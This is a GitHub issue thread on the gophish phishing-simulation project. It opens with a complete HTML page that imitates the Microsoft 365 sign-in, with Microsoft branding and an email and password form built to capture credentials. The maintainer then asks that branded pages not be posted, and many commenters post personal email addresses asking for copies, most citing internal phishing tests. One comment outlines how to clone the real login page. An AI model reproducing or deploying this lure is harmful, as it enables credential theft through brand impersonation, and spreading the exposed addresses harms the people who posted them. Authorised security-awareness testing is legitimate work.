### ISSUE TITLE
Office 365 New Landing Page

### ISSUE THREAD

**Issue by jbilliau** [gophish/gophish#1071]
I felt obligated to get the new Microsoft 365 landing page to work.  The old portal page no longer is available as Microsoft has switched to the new design.   This code could use a cleanup, but it works if anyone wants to use it.  I had to manipulate the form to get it to work, but at least it does.  Here is a preview:  https://imgur.com/a/CHRLZ2J

If you need the old landing page, I have a full working copy of that too just ask....

```
<!DOCTYPE html><html><head>
	<title>Sign in</title>
	<meta charset="utf-8"/><meta http-equiv="x-ua-compatible" content="ie=10"/><meta name="viewport" content="width=device-width, initial-scale=1"/>
	<link href="https://cdn.odc.officeapps.live.com/odc/stat/hrd.css?b=9409.6601" rel="stylesheet"/><!--[if IE 8]><script src="https://cdn.odc.officeapps.live.com/odc/stat/html5shiv.js?b=9409.6601"></script><![endif]-->
   
</head>
<body>
<div class="background">
<div class="blur"> </div>
<div class="full"> </div>
</div>

<div class="outer">
<div class="middle">
<main class="inner" style="display: none;">
<div class="margin-bottom-20"><picture class="logo margin-bottom-16" role="presentation"> <source srcset="https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.svg?b=9409.6601"/> <img src="https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=9409.6601"/> </picture></div>
<!-- ko ifnot: showSplitter -->

<div aria-describedby="signInDescription" aria-labelledby="signInTitle" role="dialog">
<div class="row text-title margin-bottom-16" data-bind="text: config.text.header" id="signInTitle">Sign in</div>

<div id="signInDescription">
<!-- ko if: context -->
<div class="row text-body margin-bottom-12 margin-top-12" data-bind="html: context">
<span>Choose the account you&#39;d like to use to open </span><a>Test</a><span>.</span></div>
<!-- /ko --></div>

<div aria-atomic="true" aria-live="assertive" aria-relevant="text" class="alert alert-error text-body margin-bottom-12 col-md-12" data-bind="visible: error, html: error" role="alert"> </div>
 
 <form method="post" action="" name="SignIn" autocomplete="off" novalidate="">
<div class="row margin-bottom-16">
<div class="form-group col-md-12 placeholderContainer">

<input type="email" name="email" aria-label="Email or phone" aria-required="true" class="form-control" placeholder="Email, phone or Skype" /> 
<input type="password" aria-label="Password" name="password" placeholder="Password" class="form-control" tabindex="2"/>
							
</div>
</div>
<input type="submit"class="btn btn-block btn-primary" value="Sign In"/>
</form>

<div class="row margin-bottom-20">
<div class="col-md-12 section text-secondary">
<span data-bind="text: config.text.noAccount">No account?</span> <a aria-label="Create a Microsoft account" data-bind="text: config.text.createAccount, attr: {&#39;aria-label&#39;: config.text.createAccountAria}, click: msAccountSignUp" href="#">Create one!</a></div>
</div>
</div>

<div class="row inline-block no-margin-top-bottom button-container">

</div>
</main>
</div>
</div>

<footer id="footer">
<div>
<div class="footerNode"><span>©2018 Microsoft</span> <a data-bind="text: config.text.privacyAndCookies, attr: {&#39;data-url&#39;: config.links.privacyAndCookies}" href="#">Privacy &amp; Cookies</a></div>
</div>
</footer>
<noscript>
		Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br />
		<br />
		To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.
	</noscript>
	<script src="https://cdn.odc.officeapps.live.com/odc/stat/jquery-1.12.4.min.js?b=9409.6601"></script>
	<script src="https://cdn.odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=9409.6601"></script>
	<script src="https://cdn.odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=9409.6601"></script>
	<script src="https://cdn.odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&amp;mkt=1033&amp;hm=0&amp;b=9409.6601"></script>
	<script src="https://cdn.odc.officeapps.live.com/odc/stat/hrd.min.js?b=9409.6601"></script>
	<script>
		var EmailHrdPage = new Hrd({"correlationId":"ba7fd0a6-4bfc-46bc-b064-ff5344e009ea","params":{"accelerated":false,"app":23,"culture":"en-US","dir":"ltr","email":null,"exp":null,"focus":true,"fpEnabled":false,"hm":0,"hostInterface":1,"idp":"","path":"https://cdn.odc.officeapps.live.com/odc/v2.0/hrd","p":6,"sp":null,"ver":16},"services":{"getIdpUrl":"https://cdn.odc.officeapps.live.com/odc/emailhrd/getidp","getIdpTimeout":20000,"getFederationProviderUrl":"https://cdn.odc.officeapps.live.com/odc/emailhrd/getfederationprovider","getFederationProviderTimeOut":20000},"text":"","links":{"renameYourAccount":"https://go.microsoft.com/fwlink/?LinkID=733247","privacyAndCookies":"https://go.microsoft.com/fwlink/?LinkId=521839"}}, OOUI);
	</script>

</body></html>
```

**Comment by jordan-wright** [comment]
Hi @jbilliau - thanks for reaching out, and thank you for offering to help the community!

I'm afraid I'll need to redact the HTML out of the issue. Spoofing branded assets is a risky business. I'm not a lawyer, but the last thing I want is for the Gophish repository to be taken down because we're found to be hosting trademarked HTML or something similar. I recommend that, if anyone is interested in the landing page suggested by @jbilliau that they contact them directly and work that process out outside of the Gophish repository.

On a similar note, I recommend considering not using branded assets at all. Even something as simple as removing brand names and logos from the HTML can help keep the same (or similar) click/submit percentages while helping maintain your users trust association with the brand in question.

That said, I 100% understand that your goal here was just to share your work with the larger community so please know that it's appreciated! I apologize for this confusion and inconvenience but I hope you understand that I need to be extra cautious when protecting the project.

**Comment by habsfan50** [comment]
Hi @jbilliau 
Is there anyway I could get a working copy of the Microsoft 365 landing page? Does it work so that when the user types in their email and password and clicks "Sign in", then it registers as a submitted data in the gophish dashboard? I am using this for testing purposes only. 

Thanks.

**Comment by jbilliau** [comment]
Sure, let me fire up the server and dig up the code

**Comment by jordan-wright** [comment]
Hey everyone!

I would ask that we please don’t share branded landing pages directly on the Gophish repository. If y’all want to email each other, that should be fine, but if you could please not upload the assets here it’d be much appreciated!

Thanks!

**Comment by throwaway4123** [comment]
@jbilliau and @habsfan50 I'm also interested in the code for the new 0365 login page, please reach out to me at jbob43738@gmail.com, much appreciated!

**Comment by NicolasCarson** [comment]
@jbilliau Can you reach out to me and provide the html for your O365 landing page? I want to use it for an internal phishing campaign for my organization. Can you reach out to me at nicolas9101@gmail.com ?

Much appreciated.

**Comment by StanEmerson** [comment]
I've got this landing page, I’m a sysadmin, not much of a web guy, I get the image background, privacy notice at the bottom and “2018 Microsoft but no dialog box to enter credentials.  Is there anything that I have to customize for this to be show?

**Comment by StanEmerson** [comment]
I think I figured out the issue, I need this file.  If there's nothing proprietary in this could someone post it as txt?  http://365portal.onthewifi.com/static/login.js  It doesn't appear to be available anymore.

**Comment by andrewnicolalde** [comment]
I need this as well. Could you email me at andrew.nicolalde@gmail.com ? Much appreciated :)

**Comment by wastingoctober** [comment]
Is there any way I could get a copy (from anyone in this thread who happens to see this)? Also trying to run a phishing campaign for my company. Email is cyberinferno AT outlook DOT com.

**Comment by choikappa** [comment]
Hi, I hope the thread is still active and I would totally appreciate a copy of the office 365 page at choikappa93 at gmail.com

**Comment by iammrfrank** [comment]
can you send it to me as well? iammrfrank@gmail.com

**Comment by nisani3** [comment]
can you send it to me please nisani33@gmail.com

**Comment by hrmb12** [comment]
Please could I get the old landing page? here's my email robmichaelhere@gmail.com
thank you

**Comment by dakotech** [comment]
Could you send it to me as well? thanks d.k.2019roger@gmail.com

**Comment by soumikcv** [comment]
@jbilliau Hey, I'd also be interested in the same. Could you mail me the source at soumiksur.me@gmail.com whenever you find some free time? Cheers.

**Comment by CodyTousignant** [comment]
@jbilliau I'd love the landing page when you have a moment. Need to do some tests in our office and O365 is our biggest concern. codyjacktousignant@gmail.com - thank you!

**Comment by bphr34k** [comment]
could you please send me the landing page/code to test at jdsadler@gmail.com? Thanks!

**Comment by adrigondite7** [comment]
could you please send me the landing page/code of Office365 to test at anonimusshop@gmail.com? Thanks! @jbilliau

**Comment by notaaron** [comment]
@jbilliau could you throw me a copy of the 365 landing page, please? Very interested in using this for our internal campaigns. abomb158@gmail.com. Much appreciated!

**Comment by Proactivecs** [comment]
Hi @jbilliau 
I've been trying to get this to work for hours... without much success.
Can you please reach out with the landing page you created at locke42@protonmail.com ?

Thank you so much

**Comment by jorgsmash** [comment]
Hey @jbilliau Do you still have a working copy of the new 365 login page? Could you send it to me please? My email is jleonard.controlscan (at) gmail (dot) com

**Comment by Hibzz1985** [comment]
Hi @jbilliau ,

Can I please get a copy of the Microsoft Office 365 landing page? My e-mail is Hibzz1985@gmail.com

Thank you

**Comment by matti-au** [comment]
Hi @jbilliau 

Can you shot me a copy of the O365 login page - mattiaus20@gmail.com

Thanks!

**Comment by fals3s3t** [comment]
please send to fals3s3t@gmail.com

THANK YOU!

**Comment by Applederpa** [comment]
Hello @jbilliau,

if there is a still a working copy available, i would be grateful if you could send it to awbella1@gmail.com

Planning a GoPhish Campaign in our company to see if the E-Learnings helped our employees.

Thanks!

**Comment by bphr34k** [comment]
I would like one as well.
Please and thank you.

**Comment by Alhasid** [comment]
could you send me a copy at orodriguez@bmapr.com?

**Comment by huheha** [comment]
hi @jbilliau or anyone could you please share the office 365 landing page with me at huheha@hotmail.com ? thanks!

**Comment by x41x41x41** [comment]
If anyone has a copy I'd appreciate getting one. mossj88@gmail.com

**Comment by bphr34k** [comment]
never recieved a copy - but if any of you have it, could you share it with
me?

**Comment by x41x41x41** [comment]
I ended up creating my own from scratch it wasn't too difficult (load the o365 login, copy the source using developer tools, then use jQuery to recreate the transitions). It's needs some cleaning up before I think about releasing it though.

**Comment by jordan-wright** [comment]
Hi everyone,

This issue has been running for over a year. To save @jbilliau's inbox, I'm going to lock this thread.

I have plans to improve the way we can share templates, but it will be a while before it's live.
